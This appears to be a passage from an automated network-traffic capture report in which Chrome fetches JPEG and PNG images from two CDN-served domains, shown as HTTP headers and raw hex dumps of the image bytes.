                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 4055374550833728864
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC1119INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:20 UTC4096INData Raw: 11 00 02 11 01 03 11 01 ff c4 00 ad 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 05 06 03 04 07 02 08 01 00 01 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 02 03 00 01 04 05 06 07 08 10 00 02 01 03 04 01 02 04 04 02 08 05 03 05 00 00 01 02 03 11 04 05 00 21 12 06 31 41 13 51 61 14 07 71 81 22 32 91 42 a1 b1 c1 d1 52 62 72 15 e1 23 33 24 25 82 b2 16 92 a2 43 35 08 11 00 02 02 01 02 03 06 03 05 07 03 04 03 00 00 00 01 02 00 11 03 21 04 31 12 05 41 51 61 71 22 06 81 32 13 91 b1 42 72 23 a1 c1 d1 52 62 14 07 82 92 b2 f0 f1 a2 53 33 24 15 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 f1 e0 1a fd 0d 3f 34 93 24 03 55 06 e4 80 6a a0 99 25 01 d8 8a 83 e7 52 0d d4 a9 21 78 14 a0 dd 1b f6 9f 87 cb 4d 53 73 ad b7 cf f5 17 c4 4f d1 bd 16 a0 fe a1 e0 e8 a6 89 32
                                                                                                                                                          Data Ascii: !1AQaq"2BRbr#3$%C5!1AQaq"2Br#RbS3$??4$Uj%R!xMSsO2
                                                                                                                                                          2024-06-09 22:41:20 UTC4096INData Raw: a3 c1 04 4b 74 c5 57 dd 99 45 29 4d d8 a9 60 3c ec 3c 9f 86 a8 ed 9a 79 c5 ff 00 21 f4 b6 57 60 c4 85 1a d2 b6 be 40 81 f6 f0 1d a6 68 3f 6f ba b6 67 03 d9 b2 09 94 1e da 41 66 ae 8d 13 96 8a 53 2b 95 43 5d ab 4e 0f b1 1a 6e 0c 4c 8d af 74 f1 9e fa f7 46 cb aa f4 bc 67 6f a9 6c 84 7a 85 32 f2 8b 3f 6f 32 ea 0d 1e 11 1e f3 19 9a ed f9 be c1 9a b3 f6 a0 c5 c5 71 27 3c 9d d4 82 28 16 38 bf 4a 02 c6 b5 a2 28 ad 06 de ba 59 53 91 89 1c 27 af da 75 5d 9f b7 b6 3b 6d 9e 5b 39 8a 0f 42 0e 67 2c da b6 9f 98 9a be 3d 92 fd 8f 47 ec cd 1c 13 7b 76 e6 2b 96 a5 b4 9f 51 1d 24 1b 95 64 df 70 ca 39 0f 88 df 44 31 34 3c 9e fd e9 48 cc 8c cf 6a 3d 43 91 bd 3c 2c 36 9a 10 4f 29 ee 6d 21 03 d3 72 97 d7 77 98 39 63 87 de 4b 7e 57 01 9f f4 18 e4 00 6c 40 35 f3 4f 1a 3f a6 4e
                                                                                                                                                          Data Ascii: KtWE)M`<<y!W`@h?ogAfS+C]NnLtFgolz2?o2q'<(8J(YS'u];m[9Bg,=G{v+Q$dp9D14<Hj=C<,6O)m!rw9cK~Wl@5O?N
                                                                                                                                                          2024-06-09 22:41:20 UTC4096INData Raw: 86 61 f9 27 fc 75 af 08 d6 72 f7 da a8 f3 98 e1 35 35 d6 b9 cf 8c 5d 76 c6 0b ab 92 f7 22 b1 a7 81 e9 f8 e8 5c 91 c2 68 c2 a0 ea 66 91 fe d1 6a c9 1a c5 12 fb 5e ba 57 34 d5 53 37 ec 96 11 db 5d 97 b5 4e 2a bf b8 8d 37 1b 58 89 c8 b5 a8 94 ed 73 d7 b6 d1 84 46 f1 e0 ea 14 06 2c 65 22 4a 73 59 4b a2 c9 1b 12 cc 37 a6 af 94 09 63 23 19 5a 2c 1e 42 e9 c3 3a 90 5c d4 b1 dc ea f9 80 84 31 99 d4 f8 0b ab 69 e2 b7 20 b7 be eb 1f 2a 78 2c 69 fd ba a0 f6 2e 0b 63 20 89 62 19 1a 29 23 91 3f 72 10 c3 f2 d0 99 cc 0d ca 6e 3d 43 77 6b 7d 69 ef dc 4c 16 48 c5 02 f8 a5 35 9d 97 59 e9 76 9b c5 60 2a 54 cb 5e 59 c5 8e 0b 6d 37 fc c7 1f ac 03 fc 6b ab 45 d6 1e 7c e2 8c 07 83 ec 6b 8e 59 a2 9a 23 2a b9 aa 1f ec 3a 7b 25 ce 3f d4 1a dc 3e fd a2 ca 5b 26 80 47 c6 46 1e 7d 34
                                                                                                                                                          Data Ascii: a'ur55]v"\hfj^W4S7]N*7XsF,e"JsYK7c#Z,B:\1i *x,i.c b)#?rn=Cwk}iLH5Yv`*T^Ym7kE|kY#*:{%?>[&GF}4
                                                                                                                                                          2024-06-09 22:41:20 UTC162INData Raw: 33 6e 86 31 a2 b1 3e 00 fd fc 21 b6 93 1c a8 03 5a a4 8c 46 f2 4a e4 0a fa 90 aa 45 35 41 44 e6 e5 ea 3b 93 f2 e2 61 e6 0f f0 9c 4f 26 3e 44 55 7b 68 e3 75 02 8f cf c8 f4 f3 a2 af 18 b3 d4 37 35 ff 00 c4 6f c8 ce 51 94 af 18 55 02 8f 3c 00 af e6 7c ea 50 98 33 e6 de 64 07 98 30 1e 44 09 f3 57 39 93 93 4d 49 73 e6 a4 93 9d 49 72 26 f9 ea 43 12 ab 81 f1 1a 21 18 b2 9c 80 7c 46 88 47 2c 1f 22 af f8 86 8c 19 a1 49 95 8a a8 f0 46 8e 32 cc 85 80 f8 8d 58 86 27 14 1a b9 73 ee aa 49 ff d9
                                                                                                                                                          Data Ascii: 3n1>!ZFJE5AD;aO&>DU{hu75oQU<|P3d0DW9MIsIr&C!|FG,"IF2X'sI


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          571192.168.2.55035090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC372OUTGET /pc/image-pc/index/382/img_bg.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC621INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 791405
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:14 GMT
                                                                                                                                                          ETag: "64c0a20a-c136d"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[19],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,15],EU-FRA-paris-GLOBAL1-CACHE11[7],EU-FRA-paris-GLOBAL1-CACHE8[0,TCP_HIT,7],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2063150
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: d8fe7420ac5bedf6ea8b5f2bdc5070c9
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 528850
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC15763INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 2f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 30 36 37 20 37 39 2e 31 35 37 37 34 37 2c 20 32 30 31 35 2f 30 33 2f 33 30 2d 32 33 3a 34 30 3a 34 32 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*Duckyd/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: d3 ee 11 34 2c 85 eb 77 47 35 dc 70 e7 72 f8 14 92 cf 3e 45 a8 7e b5 24 85 f2 32 30 fd 6b 6c eb 08 2d 92 d7 50 f6 17 f5 dc 3b 10 cd b8 0f d7 70 ec 42 15 a4 3f 5c 77 76 21 60 fd 71 dd d8 80 4f d7 3e ce b0 a1 a5 65 0c 26 d3 94 28 e7 88 c0 b7 48 f8 aa aa 51 6e 75 8b fd e1 2f cd db f7 ab 71 c6 00 f3 e4 e2 5f a4 7c 54 3a 51 ec 04 1c f1 18 77 84 54 4b 69 01 fa f9 6d ed 1f 15 9f 12 40 73 f2 db da 3e 2a d5 aa 9f 53 50 05 3c f9 38 97 e2 47 c5 5f 8d 17 b7 72 04 fd 77 0e c5 27 3e 4f 7b 0f d7 70 ec 50 d2 b2 86 50 07 3b c0 71 6f 05 0a aa bb 48 0f d7 6f 89 fb 6f 56 01 fa e3 bb b1 00 7e b8 ee ec 40 1f ae 3b bb 10 0c 3c ee 8f 35 0b 9c 28 e1 eb 8f 42 01 3f bc 4d 28 05 6b 81 a2 10 da 5b 87 eb 06 3a 86 97 76 7c fc 54 48 e5 5e e1 fa ea d0 88 c7 6b d1 f6 71 41 2b a0 92 e7 a9
                                                                                                                                                          Data Ascii: 4,wG5pr>E~$20kl-P;pB?\wv!`qO>e&(HQnu/q_|T:QwTKim@s>*SP<8G_rw'>O{pPP;qoHooV~@;<5(B?M(k[:v|TH^kqA+
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: 6e 7d 85 b6 20 23 97 31 31 42 48 05 c0 00 79 87 1c d9 01 a3 ec fc 85 df 77 e7 ac 72 90 8d c1 6c cc 9e 62 ed 5a dd a8 31 33 7c 03 82 07 4a a5 ef c1 49 29 49 e8 de e1 cf da b1 6e df 23 c9 89 5b e5 b9 68 69 b7 93 bf cf 29 52 a6 44 3a e7 75 57 7c a7 43 64 97 4d 8e 5b 98 e6 e7 2c 09 77 27 8c ab 4d 8c a5 51 55 ca 22 eb 42 81 bd 72 52 35 62 46 96 ab 97 23 3c 19 6b 4d cc 99 17 a9 3d 64 6a ae 9f 33 62 e0 85 b7 42 9f d7 e4 25 cb 93 31 ac 89 af 4b b1 03 bd 11 17 db cc a7 ae 44 4b 1d 91 a3 6c 39 b5 15 eb b9 91 5e 72 96 8c 5c ea cf 20 01 e8 a2 db 1f bb c8 ad b6 29 4a e4 c1 23 57 43 e2 3a 56 c6 65 39 dc 90 0e f9 fd b7 b2 02 a4 ae cf 55 08 61 8e 23 ec c5 01 0c ee 4c 1c 5d eb f6 21 8a 02 0f d4 17 23 54 a9 90 64 01 eb cb f3 4b b1 00 d3 75 f6 be 54 18 f8 20 0f 56 7b 7b fe
                                                                                                                                                          Data Ascii: n} #11BHywrlbZ13|JI)In#[hi)RD:uW|CdM[,w'MQU"BrR5bF#<kM=dj3bB%1KDKl9^r\ )J#WC:Ve9Ua#L]!#TdKuT V{{
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: 78 98 ea ad 36 f7 2e 1b 65 7c bc 0b bf 9c aa a6 11 96 7d ce fd c8 4a 7e bc ce a2 e5 c9 ad 0d 38 ae 4f 91 9b 45 f5 21 7e e4 94 c4 2d 0a e3 dd 2f 5b 31 1e b4 c3 07 f2 ca 59 02 33 a1 55 ae 46 97 73 92 df b9 3a b9 a3 f5 6c 3e 3e f5 ce 4c c8 0b da 81 f9 41 f9 9d c5 4f 41 51 6b bb 28 84 74 e0 f9 d9 32 b8 bc ec 74 5c 94 79 6e 64 1b 9e e4 31 d2 d2 15 72 46 0d b1 87 5a c7 26 de 67 4f 35 97 d2 f6 37 e1 ed be d9 73 44 79 2b 76 8c 89 a1 90 12 2e 41 0c d5 65 91 7c 75 55 b4 d7 73 43 98 f7 0b be cd cb 0b 26 72 8c a2 c4 98 c4 0d 2d 5c 5b 20 42 8b 57 92 83 b3 1d f8 3e 4f 62 0b 3f 53 5b f7 13 2b 3e e1 6c 73 56 27 13 6e 5e a0 14 8e d0 6b 56 59 ba 35 b6 a6 bf 71 64 ff 00 0d 4a e5 a1 e4 3f 56 7b 20 f6 fe 74 f3 1c a4 4f e8 f9 81 ae dc 23 f2 c6 24 bb 71 60 a8 ea d6 e7 c6 7e f3
                                                                                                                                                          Data Ascii: x6.e|}J~8OE!~-/[1Y3UFs:l>>LAOAQk(t2t\ynd1rFZ&gO57sDy+v.Ae|uUsC&r-\[ BW>Ob?S[+>lsV'n^kVY5qdJ?V{ tO#$q`~
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: 20 81 00 20 19 3c 3a 7c 0a 02 24 00 80 8a 78 8e 08 04 02 2d 52 5f ed b8 a0 1b 29 46 34 0e 68 ff 00 76 08 0a d2 bb b0 f6 90 c8 08 b5 cb 6f 72 01 18 ec 3d 45 00 18 d0 bc 4b 74 f1 40 33 4c 46 3d e7 e2 80 e6 fe a7 11 fd 05 96 67 fd 65 bc df ff 00 07 98 40 7a fe b8 9f c7 01 41 8b b6 03 b5 7c ea 3e 80 35 47 fd 6d be df 8a 90 2b 83 85 cb 7d bf 14 00 e0 63 72 1d bf 14 02 6a 8f fa db 7d bf 14 02 b8 38 5c b7 db f1 40 14 fc f0 ea 28 01 c0 c6 e4 3b 7e 28 04 d5 1f f5 b6 fb 7e 28 03 54 7f d6 db ed f8 a0 0d 51 ff 00 5b 6f b7 e2 80 35 47 fd 6d be df 8a 01 5c 1c 2e 5b ed f8 a0 0a 7e 78 75 14 00 e0 63 72 1d bf 14 00 e0 e1 72 df 6f c5 00 38 18 dc 87 6f c5 00 9a a3 fe b6 df 6f c5 00 6a 8f fa db 7d bf 14 01 aa 3f eb 6d f6 fc 50 06 a8 ff 00 ad b7 db f1 40 1a a3 fe b6 df 6f c5
                                                                                                                                                          Data Ascii: <:|$x-R_)F4hvor=EKt@3LF=ge@zA|>5Gm+}crj}8\@(;~(~(TQ[o5Gm\.[~xucrro8ooj}?mP@o
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: 62 ff 00 69 7e e7 96 dc 5d 63 42 51 f4 8f bc 0d 40 72 d7 b5 5b ac 74 c3 49 20 12 3c cc da bc a5 55 e5 a1 ad bf d8 ff 00 bc d9 ce 16 e5 76 92 dd 8f a5 fd ea e0 79 72 97 c1 96 0d 0c c3 10 e3 7b 2c fe e2 4e 4e 9c 3f ed 5f de 9d be ce 5a e8 ba 97 ad fd 29 ef 21 cc b9 3b c0 48 53 fb 30 70 6a 36 9c 49 2e a1 e6 aa d6 14 1d f5 ff 00 6a fe e1 8b 2f 2b a6 aa d1 76 3f 4a 7b 99 31 9f e8 f9 93 28 fe 11 1a 53 68 6a d1 3f d4 57 e8 7b 3f 1b fd b9 9a d6 f5 53 48 34 2c 7b 07 35 e5 03 94 bd 22 64 4c e4 63 38 88 c9 b4 69 00 06 c6 4b 2c b9 d3 aa 69 ea 99 f4 1f 1b f6 57 8d c7 18 71 fa 1b 9c b7 b1 5d 6d 57 62 61 18 88 86 11 2f aa 2e f9 3f 15 cb 7c 8d a9 4f 53 d5 a7 c1 a6 3d 5a 3a 2e 5b d9 b9 6b 76 c4 a4 0c dc ea 14 02 41 81 71 5c aa eb 2e 76 d8 e9 58 d2 50 d2 83 73 97 e4 b9 62
                                                                                                                                                          Data Ascii: bi~]cBQ@r[tI <Uvyr{,NN?_Z)!;HS0pj6I.j/+v?J{1(Shj?W{?SH4,{5"dLc8iK,iWq]mWba/.?|OS=Z:.[kvAq\.vXPsb
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: 35 3a 1e 5f e9 bb 92 d1 a8 16 00 87 63 e6 12 62 00 c2 ac 16 51 d1 f5 42 d8 9b 72 cd bf 6f fa 50 42 fc 24 20 63 2d 6e 25 a6 ae 5c 69 39 32 e3 c9 b4 f8 9b 57 0f 3d 2b 12 6e f3 1e c1 08 10 65 36 91 3a da 8c e0 33 52 ab 9a eb 43 4a e0 69 b5 6d a0 86 c7 b3 72 f7 39 ab 60 01 32 08 70 2a f5 8b ba ca 3b 9c bf 26 8b 17 c6 e7 d5 5b f2 67 41 73 d8 25 28 13 28 42 86 26 2e 03 e8 76 d2 4e d2 52 0f 01 64 79 2f 35 7d 4e 7f 99 f6 88 69 9c 88 b7 03 09 cc 88 93 88 12 88 ea 24 a1 d6 f1 5f 2d f8 24 f6 92 b7 2f c9 da 8c ee 6a d1 84 65 12 19 cc 8c a2 cf b0 b1 50 d4 e8 88 f9 38 32 2c 6b d2 db 9f d4 3d ce c5 be 5b 97 37 e5 21 52 44 40 c4 92 46 1b 98 23 69 68 4f c5 f8 f7 79 38 b4 d2 8f cc c4 8f b8 72 b6 88 f3 90 c0 1a 0a 12 e4 c8 75 f7 28 e5 1b ec 7b b4 fd b3 ee af 56 c5 fb 1f 52
                                                                                                                                                          Data Ascii: 5:_cbQBroPB$ c-n%\i92W=+ne6:3RCJimr9`2p*;&[gAs%((B&.vNRdy/5}Ni$_-$/jeP82,k=[7!RD@F#ihOy8ru({VR
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: 84 c9 3a 86 b2 36 96 67 c4 64 ea 05 68 f5 95 d0 43 30 62 62 64 e4 4a 81 e9 e6 72 ee 0b a9 4e c9 fa 77 2a 93 ec 48 2f 68 11 6a d4 03 5c 0e 24 8d 82 8a ad 28 ff 00 98 86 bb 9a b6 39 8b 37 26 44 8b 19 33 c4 d1 a3 0a 91 5d b2 62 90 56 3a ad cd 51 6a dd f6 23 49 a1 76 c0 99 e0 4e 6e aa 9b 5b 90 9d 96 b6 d8 8e e7 b6 e8 87 a8 c2 3e 68 c4 0d 55 78 ea e9 c0 ab d7 d6 e2 47 25 d0 a9 2e 53 4d 74 b8 34 2c ef c0 ec a2 bb af 1d 77 22 64 88 f2 f1 c7 4d 44 a8 f9 47 6f 5a d6 94 ec b5 2b 6b 2a a9 72 3a 7c ad bd 23 f3 6a 04 66 33 ef 74 49 ab 4b 29 f7 ea ba 32 33 ca b3 c9 8b 98 91 87 0f 00 ab 93 6f 33 45 9e ad 6e 43 2e 44 17 11 81 c0 93 8b e2 f8 ac 4d 55 de e9 91 cb 91 20 45 a3 90 07 73 86 c3 8c 94 3a ce e8 de b9 5c 6a 41 3e 4a fc 43 88 01 12 c2 a3 28 82 2b fd 25 5e 24 ac ad
                                                                                                                                                          Data Ascii: :6gdhC0bbdJrNw*H/hj\$(97&D3]bV:Qj#IvNn[>hUxG%.SMt4,w"dMDGoZ+k*r:|#jf3tIK)23o3EnC.DMU Es:\jA>JC(+%^$
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: 76 6e 52 5c 78 91 a0 c1 8e 3d 3b 14 0e 4d 6a 39 e2 49 0c 0d 1f 50 19 e1 99 08 55 c5 f4 b4 a1 a6 18 4a 32 12 3f 94 62 37 e2 70 6e d4 25 63 55 7e 9d c4 d1 2a 89 12 4b 7c c3 33 fb 10 b4 34 46 c0 c9 a8 1a 2e 29 bd 98 74 29 98 29 78 6b 55 28 49 33 44 44 16 c5 df 51 ae ea 30 44 cc 7e de 3f ee d8 90 19 c2 2f 6e ec ed 48 1d 5f d9 bc 76 e2 41 0e aa d5 1f b9 4a 3a 28 f2 e2 49 ac 8f 8f 45 26 ef 21 f5 6f d4 1e da 04 79 7f 73 e6 0c 23 84 2e 5c 37 6d 65 43 6e 41 cc 48 0d 8a c2 df 07 e3 e5 d5 2e 36 3d 3c 1f bd fe ed f1 fd 38 ef e8 ec 76 1c af f1 32 f5 cd 11 f7 6f 68 e4 f9 c7 26 37 2f 72 f1 fd 2d c2 08 ab b6 b7 a2 e3 c9 fb 73 4d f0 7a 9e b6 0f f7 55 f1 e9 f2 2a ec cd fb 7f 51 7d 15 ee 6f 19 5c e6 7d aa e3 56 37 23 ea 5a 7d 55 8f ab 90 73 b3 25 c5 6f 87 f2 a9 79 d6 d5 f0
                                                                                                                                                          Data Ascii: vnR\x=;Mj9IPUJ2?b7pn%cU~*K|34F.)t))xkU(I3DDQ0D~?/nH_vAJ:(IE&!oys#.\7meCnAH.6=<8v2oh&7/r-sMzU*Q}o\}V7#Z}Us%oy
                                                                                                                                                          2024-06-09 22:41:20 UTC16384INData Raw: 16 a1 ac 8e f0 aa 4d 71 bb 38 14 73 bc d4 86 ad 73 88 da 2a 49 19 1d cb 4c 6d 4e fd 0b 5b 0f 14 3e df 3d cc 02 3c f2 93 17 0e e2 b5 19 d3 35 ac d7 b9 cd 6c 0a cb 5d 0b 96 bd c6 e5 b9 83 ea 4f 6e 9d 59 3e 38 d4 a9 39 6d 8d ab 71 ae a6 c7 2f ef 57 28 35 98 81 27 d9 42 f5 27 30 5d 07 db b9 a7 0f 77 94 98 dc ba 48 ca 84 d7 6e 2a d5 69 3d 4b 52 96 4e 59 29 e7 e1 20 03 be 07 cc e1 87 8b ad 39 a3 4e 3d 8c fb b7 4c 84 d8 d4 be c6 6a 9c 4a ba bd 5a 85 b9 83 dd 99 5c c4 05 d8 87 c4 30 39 ee 3b 5c 14 fa 9a f2 7a 7d bd ce 7f 98 f6 f8 bb c0 d7 16 27 06 72 46 dc d6 17 aa eb b1 bd 73 5a a9 4e e6 24 ed dd b5 af 06 72 40 a1 e0 b9 ef 8d ef fd 27 6d 73 2b 2f 56 ac 5b 73 3a 4c 4c 88 05 d9 99 df ec 52 8a af 4b 6d 06 56 71 a9 14 e8 e6 44 98 b1 2f a8 10 e7 68 c4 15 95 91 ad 2d
                                                                                                                                                          Data Ascii: Mq8ss*ILmN[>=<5l]OnY>89mq/W(5'B'0]wHn*i=KRNY) 9N=LjJZ\09;\z}'rFsZN$r@'ms+/V[s:LLRKmVqD/h-


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          572192.168.2.55035390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC378OUTGET /pc/image-pc/index/312/btn_forget_n.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1226
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Sat, 22 Jan 2022 09:11:29 GMT
                                                                                                                                                          ETag: "61ebca41-4ca"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[1],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,0],EU-FRA-paris-GLOBAL1-CACHE10[3],EU-FRA-paris-GLOBAL1-CACHE5[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465106
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: ea05eca9fc38a7eb8ef1fafd9f06252c
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126899
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:20 UTC1226INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0e 00 00 00 0e 08 06 00 00 00 1f 48 2d d1 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 34 35 20 37 39 2e 31 36 33 34 39 39 2c 20 32 30 31 38 2f 30 38 2f 31 33 2d 31 36 3a 34 30 3a 32 32 20 20
                                                                                                                                                          Data Ascii: PNGIHDRH-tEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          573192.168.2.55034143.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:20 UTC403OUTGET /fiximg/ac-20200404/fileupload/uy09/202108/202108190259527.png HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:20 UTC291INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:20 GMT
                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Content-Length: 3392
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 14356219493862448726
